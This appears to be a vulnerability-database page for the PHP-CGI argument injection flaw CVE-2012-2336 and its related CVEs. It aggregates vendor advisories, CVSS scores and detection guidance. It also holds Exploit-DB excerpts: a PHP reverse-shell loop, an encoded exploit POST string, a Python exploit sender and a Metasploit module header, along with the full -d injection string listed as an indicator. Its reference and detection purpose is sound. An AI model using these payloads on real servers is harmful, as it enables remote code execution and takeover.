CVE-2012-2336
published 2012-05-11CVE-2012-2336: sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that…
PriorityP270medium5CVSS 2.0
AVNACLAuNCNINAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
50.72%
98.8th percentile
sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to cause a denial of service (resource consumption) by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'T' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823.
Affected
107 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | php | <= 5.3.12 | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n↗
- →Detect PHP-CGI argument injection by looking for HTTP requests where the query string contains no '=' character but includes URL-encoded PHP CLI flags (e.g., %2D%64 / -d, %2D%6E / -n) separated by '+' characters targeting php-cgi paths such as /cgi-bin/php. ↗
- →Alert on HTTP requests to php-cgi endpoints where the query string begins with a '+- ' sequence, as this pattern is specifically associated with the incomplete CVE-2012-1823 fix bypass (CVE-2012-2335/CVE-2012-2336). ↗
- →Detect exploitation attempts by monitoring for HTTP POST requests to CGI-handled PHP scripts with query strings containing URL-encoded '-d auto_prepend_file=php://input' and a POST body containing PHP code, combined with Content-Type: application/x-www-form-urlencoded. ↗
- →Vulnerability check probe: detect HTTP requests to php-cgi with query string '?-s' (source display flag); a 200 response containing PHP source markup indicates a vulnerable target. ↗
- →Monitor for HTTP responses containing 'Parse error:' or 'Warning:' strings in reply to CGI query-string probe requests, as exploit tools use these patterns to confirm PHP-CGI vulnerability. ↗
- ·This vulnerability only affects PHP when deployed as a CGI binary (php-cgi). PHP running as an Apache module (mod_php) is NOT affected. ↗
- ·CVE-2012-2336 is an incomplete fix for CVE-2012-1823; systems patched to PHP 5.3.12 / 5.4.2 (the initial CVE-2012-1823 fix) remain vulnerable. The complete fix requires PHP 5.3.13+ or 5.4.3+. ↗
- ·The exploit also bypasses several PHP hardening settings (safe_mode, open_basedir, disable_functions, suhosin) by injecting -d directives via the query string, so those controls cannot be relied upon as mitigations on vulnerable php-cgi versions. ↗
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
vulncheck9.8CRITICAL
vendor_redhat9.8CRITICAL
vendor_ubuntu5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-gjrg-p28q-p9w2: sapi/cgi/cgi_main
ghsa_unreviewed·2022-05-14·CVSS 9.8
CVE-2012-2336 [CRITICAL] CWE-20 GHSA-gjrg-p28q-p9w2: sapi/cgi/cgi_main
sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to cause a denial of service (resource consumption) by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'T' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823.
VulnCheck
PHP PHP Improper Input Validation
vulncheck·2012·CVSS 9.8
CVE-2012-2336 [CRITICAL] PHP PHP Improper Input Validation
PHP PHP Improper Input Validation
sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to cause a denial of service (resource consumption) by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'T' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823.
Affected: PHP PHP
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.bleepingcomputer.com/news/security/linux-and-windows-servers-targeted-with-rub
Ubuntu
PHP vulnerabilities
vendor_ubuntu·2012-06-19·CVSS 5.0
CVE-2012-0781 [MEDIUM] PHP vulnerabilities
Title: PHP vulnerabilities
Summary: Several security issues were fixed in PHP.
It was discovered that PHP incorrectly handled certain Tidy::diagnose
operations on invalid objects. A remote attacker could use this flaw to
cause PHP to crash, leading to a denial of service. (CVE-2012-0781)
It was discovered that PHP incorrectly handled certain multi-file upload
filenames. A remote attacker could use this flaw to cause a denial of
service, or to perform a directory traversal attack. (CVE-2012-1172)
Rubin Xu and Joseph Bonneau discovered that PHP incorrectly handled certain
Unicode characters in passwords passed to the crypt() function. A remote
attacker could possibly use this flaw to bypass authentication.
(CVE-2012-2143)
It was discovered that a Debian/Ubuntu specific patch caused PHP
Red Hat
php: command line arguments injection when run in CGI mode (VU#520827)
vendor_redhat·2012-05-03·CVSS 9.8
CVE-2012-1823 [CRITICAL] php: command line arguments injection when run in CGI mode (VU#520827)
php: command line arguments injection when run in CGI mode (VU#520827)
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
Statement: This flaw did not affect the versions of PHP in Red Hat Enterprise Linux 3 or 4. Updates were released for Red Hat Enterprise Linux 5 and 6 (RHSA-2012:0546, RHSA-2012:0547), Red Hat Enterprise Linux 5.3 Long Life (RHSA-2012:0568), Red Hat Enterprise Linux 5.6, 6.0, and 6.1 Extended Update Support (RHSA-2012:0568, RHSA-2012:0569), and Red Hat Appli
Red Hat
php: incomplete CVE-2012-1823 fix - insecure wrapper
vendor_redhat·2012-05-03·CVSS 9.8
CVE-2012-2335 [CRITICAL] php: incomplete CVE-2012-1823 fix - insecure wrapper
php: incomplete CVE-2012-1823 fix - insecure wrapper
php-wrapper.fcgi does not properly handle command-line arguments, which allows remote attackers to bypass a protection mechanism in PHP 5.3.12 and 5.4.2 and execute arbitrary code by leveraging improper interaction between the PHP sapi/cgi/cgi_main.c component and a query string beginning with a +- sequence.
Statement: The mitigation for CVE-2012-2335 is included in the following PHP updates for Red Hat Enterprise Linux 5 and 6, which also address CVE-2012-2336 (BZ#820708):
https://rhn.redhat.com/errata/RHSA-2012-1045.html
https://rhn.redhat.com/errata/RHSA-2012-1046.html
https://rhn.redhat.com/errata/RHSA-2012-1047.html
Package: php (Red Hat Enterprise Linux 4) - Not affected
Package: php (Red Hat Enterprise Linux 5) - Affected
Pac
Red Hat
php: incomplete CVE-2012-1823 fix - missing filtering of -T and -h
vendor_redhat·2012-05-03·CVSS 9.8
CVE-2012-2336 [CRITICAL] CWE-228 php: incomplete CVE-2012-1823 fix - missing filtering of -T and -h
php: incomplete CVE-2012-1823 fix - missing filtering of -T and -h
sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to cause a denial of service (resource consumption) by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'T' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823.
Package: php (Red Hat Enterprise Linux 4) - Not affected
No detection rules found.
Exploit-DB
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner
exploitdb·2013-10-31
CVE-2012-2336 Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner
Apache + PHP array("pipe", "r"), 1 => array("pipe", "w"),2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");while (1) {
if (feof($sock)) {printit("ERROR: Shell connection terminated");break;}
if (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);}if (in_array($pipes[1], $r
Exploit-DB
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution
exploitdb·2013-10-29·CVSS 9.8
CVE-2012-2336 [CRITICAL] Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution
Apache + PHP
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
typedef struct {
int sockfd;
SSL *handle;
SSL_CTX *ctx;
} connection;
void usage(char *argv[])
{
printf("usage: %s " \
" [--force-interpreter interpreter]\n",
argv[0]);
exit(1);
}
char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \
"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \
"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \
"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \
"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \
"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \
"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \
"%%6F%%5F%
Exploit-DB
PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection
exploitdb·2012-05-05
CVE-2012-2336 PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection
PHP """
post_Length = len(pwn_code)
http_raw="""POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %s
%s
""" %(HOST , post_Length ,pwn_code)
print http_raw
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, int(PORT)))
sock.send(http_raw)
data = sock.recv(10000)
print repr(data)
sock.close()
except socket.error, msg:
sys.stderr.write("[ERROR] %s\n" % msg[1])
sys.exit(1)
if __name__ == '__main__':
try:
HOST = sys.argv[1]
PORT = sys.argv[2]
cgi_exploit()
except IndexError:
print '[+]Usage: cgi_test.py site.com 80'
sys.exit(-1)
Exploit-DB
PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)
exploitdb·2012-05-04
CVE-2012-2336 PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)
PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)
---
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'PHP CGI Argument Injection',
'Description' => %q{
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to
an argument injection vulnerability. This module takes advantage of
the -d flag to set php.ini directives to achieve code execution.
From the advisory: "if there is NO unescaped '=' in the query string,
the string is split on '+' (encoded space) characters, urldecoded,
passed to a function that escapes shell metacharacters (th
Bugzilla
CVE-2012-2335 php: incomplete CVE-2012-1823 fix - insecure wrapper
bugzilla·2012-05-11·CVSS 9.8
CVE-2012-2335 [CRITICAL] CVE-2012-2335 php: incomplete CVE-2012-1823 fix - insecure wrapper
CVE-2012-2335 php: incomplete CVE-2012-1823 fix - insecure wrapper
A CVE-2012-1823 was assigned to a PHP-CGI flaw that could allow remote attackers to execute arbitrary code by injecting php-cgi command line arguments via specially crafted query string. Refer to bug #818607 for details about this flaw.
The released fix for this issue was reported to be incomplete and can be bypassed by prefixing the query string with spaces (e.g. ?+-s). However, that problem only affected configurations where insecure wrapper script similar to the one pointed out in the CVE-2012-1823 reporter's blog post:
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
http://www.php.net/archive/2012.php#id2012-05-06-1
http://wiki.dreamhost.com/PHP.ini#Create_the_script_wrapper
While this problem is not a
Bugzilla
CVE-2012-2336 php: incomplete CVE-2012-1823 fix - missing filtering of -T and -h
bugzilla·2012-05-10·CVSS 9.8
CVE-2012-2336 [CRITICAL] CVE-2012-2336 php: incomplete CVE-2012-1823 fix - missing filtering of -T and -h
CVE-2012-2336 php: incomplete CVE-2012-1823 fix - missing filtering of -T and -h
Originally Common Vulnerabilities and Exposures assigned an identifier CVE-2012-1823 to the following vulnerability:
A flaw was found in the way the php-cgi executable processed command line arguments when running in CGI mode. A remote attacker could send a specially-crafted request to a PHP script that would result in the query string being parsed by php-cgi as command line options and arguments. This could lead to the disclosure of the script's source code or arbitrary code execution with the privileges of the PHP interpreter. (CVE-2012-1823)
This problem is in more detailed way described in a dedicated bug 818607.
Later it has been reported yet:
https://bugs.php.net/bug.php?id=61910#1336220802
http://ww
Bugzilla
CVE-2012-2311 php: incomplete CVE-2012-1823 fix - incorrect check for =
bugzilla·2012-05-04·CVSS 9.8
CVE-2012-2311 [CRITICAL] CVE-2012-2311 php: incomplete CVE-2012-1823 fix - incorrect check for =
CVE-2012-2311 php: incomplete CVE-2012-1823 fix - incorrect check for =
It was discovered that the fix that was applied in PHP versions 5.3.12 and 5.4.2 to address CVE-2012-1823 (bug #818607) was incomplete and did not resolved the problem. A remote attacker could still use this flaw to remotely execute arbitrary code on the servers using affected PHP CGI configurations.
The problem was noted in the blog post of the CVE-2012-1823 issue reporter:
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
UPDATE3: The new PHP release is buggy. You can use their workaround, but
the new releases and their patch do not fix the issue. Use our
mitigations for now.
[...]
UPDATE5: We have received word that new PHP updates with the revised fix
will be released soon. The issue that this prob
Bugzilla
CVE-2012-1823 php: command line arguments injection when run in CGI mode (VU#520827)
bugzilla·2012-05-03·CVSS 9.8
CVE-2012-1823 [CRITICAL] CVE-2012-1823 php: command line arguments injection when run in CGI mode (VU#520827)
CVE-2012-1823 php: command line arguments injection when run in CGI mode (VU#520827)
A flaw was found in the way the php-cgi executable processed command line arguments when running in CGI mode. A remote attacker could send a specially-crafted request to a PHP script that would result in the query string being parsed by php-cgi as command line options and arguments. This could lead to the disclosure of the script's source code or arbitrary code execution with the privileges of the PHP interpreter.
References:
https://bugs.php.net/bug.php?id=61910
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
http://ompldr.org/vZGxxaQ
Discussion:
PHP 5.3.12 and 5.4.2 are released to correct this:
http://www.php.net/archive/2012.php#id2012-05-03-1
They also note the mitigation/workaround
http://lists.opensuse.org/opensuse-security-announce/2012-06/msg00004.htmlhttp://lists.opensuse.org/opensuse-security-announce/2012-07/msg00003.htmlhttp://secunia.com/advisories/49014http://www.php.net/ChangeLog-5.php#5.4.3http://www.php.net/archive/2012.php#id2012-05-08-1https://bugs.php.net/bug.php?id=61910https://bugs.php.net/patch-display.php?bug_id=61910&patch=CVE-2012-1823.patch&revision=1336251592&display=1https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862http://lists.opensuse.org/opensuse-security-announce/2012-06/msg00004.htmlhttp://lists.opensuse.org/opensuse-security-announce/2012-07/msg00003.htmlhttp://secunia.com/advisories/49014http://www.php.net/ChangeLog-5.php#5.4.3http://www.php.net/archive/2012.php#id2012-05-08-1https://bugs.php.net/bug.php?id=61910https://bugs.php.net/patch-display.php?bug_id=61910&patch=CVE-2012-1823.patch&revision=1336251592&display=1https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862
2012-05-11
Published
Exploited in the wild